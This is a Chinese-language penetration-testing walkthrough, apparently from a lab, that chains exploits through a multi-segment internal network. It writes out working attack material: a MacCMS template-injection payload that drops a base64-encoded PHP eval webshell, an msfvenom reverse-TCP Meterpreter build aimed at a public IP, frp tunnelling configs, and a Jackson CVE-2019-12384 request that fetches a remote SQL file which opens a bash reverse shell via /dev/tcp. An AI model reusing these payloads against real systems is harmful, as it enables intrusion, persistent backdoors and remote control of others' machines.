苹果cms:
有个rce的洞:
getshell payload(a):index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}fput写马,test.php 密码test:index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A}
上线msf,因为我的msf没部署在公网服务器上是部署在本地的mac上的,所以先用frp映射几个端口,frpc.ini:
[msf]type = tcplocal_ip = 127.0.0.1local_port = 4444remote_port = 6000[msf2]type = tcplocal_ip = 127.0.0.1local_port = 5555remote_port = 8000[msf3]type = tcplocal_ip = 127.0.0.1local_port = 6666remote_port = 9000[msf4]type = tcplocal_ip = 127.0.0.1local_port = 7777remote_port = 9999
frps.ini:
[common]bind_addr = 0.0.0.0bind_port = 7000
msf生成木马:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=121.41.55.60 LPORT=8000 SessionCommunicationTimeout=0 -f elf > w1.elf
开下监听,shell回来了:
加路由,看下内网,这台主机有两个内网网段:
收集到的信息:
172.18.16.1:9000 open172.18.16.1:22 open172.18.16.1:80 open172.18.16.1:89 open[*] WebTitle:http://172.18.16.1 code:200 len:17 title:Welcome to nginx![*] WebTitle:http://172.18.16.1:89 code:200 len:9 title:苹果CMS172.18.25.39:8000 open172.18.25.85:3306 open172.18.25.85:80 open[*] WebTitle:http://172.18.25.85 code:200 len:9 title:苹果CMS[*] WebTitle:http://172.18.25.39:8000 code:200 len:7 title:Laravel[+] InfoScan:http://172.18.25.39:8000 [Laravel] 10.10.6.72:3306 open10.10.6.82:445 open10.10.6.82:139 open10.10.6.72:80 open10.10.6.52:8080 open10.10.6.71:9090 open[*] 10.10.6.82 (Windows 6.1)[*] WebTitle:http://10.10.6.71:9090 code:404 len:0 title:None[+] InfoScan:http://10.10.6.71:9090 [SprintBoot] [*] WebTitle:http://10.10.6.72 code:200 len:9 title:苹果CMS[*] WebTitle:http://10.10.6.52:8080 code:404 len:0 title:None[+] InfoScan:http://10.10.6.52:8080 [SprintBoot]
开sock:
先看下172的laravel:
proxifier全局代理打下laravel:
哥斯拉连接,要3.0版本以下的,因为脚本里写进去的就是3.0以下的payload:
看下10那个网段再,10.10.6.82 开了smb服务。4.6.3:
有现成的exp:
成功拿下:
sprintboot:http://10.10.6.52:9090 ,Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)。
另外的sprintboot,SpEL 表达式注入漏洞:
shell过来了:
联网的,可以wget上线下,加下路由再信息探测一波:
192.168.13.159开着redis,主从复制rce:
还剩最后一个:
CVE-2019-12384 Jackson 远程代码执行漏洞:
首先在vps上放置一个.sql的文件,内容如下:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A"); return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('bash -i >& /dev/tcp/xxxxx/7777 0>&1')
然后发送payload,请求远程的sql文件,进行RCE
POST /fuckme HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 164poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNscript FROM 'http://xxxxxx/exp.sql'"}]
至此基本打完所有段